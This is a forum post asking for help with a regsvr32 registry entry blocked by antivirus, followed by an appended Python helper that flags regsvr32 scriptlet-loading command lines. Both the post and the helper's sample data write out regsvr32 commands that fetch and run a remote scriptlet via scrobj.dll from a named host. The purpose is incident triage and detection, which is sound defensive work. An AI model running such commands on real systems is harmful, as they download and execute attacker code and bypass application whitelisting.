Hello Brian,
Thanks for the response. I submitted the sample and, as per Symantec, the file regsvr32.exe is clean. I went through many articles online (https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-regsvr32-exe/, https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/) and found that there is some registry entry created in the system by which regsvr32 tries to register a DLL and then attempts to connect to a malicious URL, which is blocked by SEP.
The registry entry created is: regsvr32.exe /s /n /u http://server2.aserdefa.ru/restore.xml scrobj.dll
I want analysis and a clue as to where this entry got created in the registry, and why only scrobj.dll was selected by regsvr32.exe to connect to the malicious domain.
Can you help, please?
Thanks,
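An added triage helper, not part of the post above or of any Symantec tooling, that scores regsvr32 process-creation command lines (for example Sysmon event ID 1 records) for the scriptlet-loading pattern the post quotes. The event records are constructed sample data; the first command line is the one from the post, the "example.invalid" host and the vendor DLL path are made up.

```python
import shlex
from urllib.parse import urlparse

# Constructed process-creation records. scrobj.dll is the Windows Script Component
# runtime: when regsvr32 is given /i:<url> (or a bare URL argument) together with
# scrobj.dll, its DllInstall export fetches and runs the remote scriptlet, which is
# why that specific DLL appears in the command line.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u http://server2.aserdefa.ru/restore.xml scrobj.dll"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},  # benign install
    {"image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": "regsvr32 /i:https://example.invalid/a.sct scrobj.dll"},  # constructed
]


def classify_regsvr32(cmdline):
    """Return the reasons a regsvr32 command line looks like a remote scriptlet load, or []."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes intact
    except ValueError:
        argv = cmdline.split()
    if not argv or "regsvr32" not in argv[0].lower():
        return []
    args = [a.strip('"') for a in argv[1:]]
    lower = [a.lower() for a in args]
    reasons = []
    if any(a == "scrobj.dll" or a.endswith("\\scrobj.dll") for a in lower):
        reasons.append("loads scrobj.dll (scriptlet COM runtime)")
    for a in args:  # /i:<url> or a bare URL argument means the payload is fetched off-host
        target = a[3:] if a.lower().startswith("/i:") else a
        parsed = urlparse(target)
        if parsed.scheme in ("http", "https") and parsed.netloc:
            reasons.append(f"remote scriptlet source {parsed.netloc}")
    if "/n" in lower and "/u" in lower:
        reasons.append("/n /u: DllInstall called for unregister, DllRegisterServer skipped")
    return reasons


def triage(events):
    """Pair each suspicious command line with its reasons; clean regsvr32 calls are dropped."""
    hits = []
    for event in events:
        reasons = classify_regsvr32(event["cmdline"])
        if reasons:
            hits.append((event["cmdline"], reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in triage(SAMPLE_EVENTS):
        print(cmdline, "->", "; ".join(reasons))
```

The hits give a starting point for the registry question in the post: correlate the flagged command line's timestamp with Run/RunOnce key writes and scheduled-task creation in the same window.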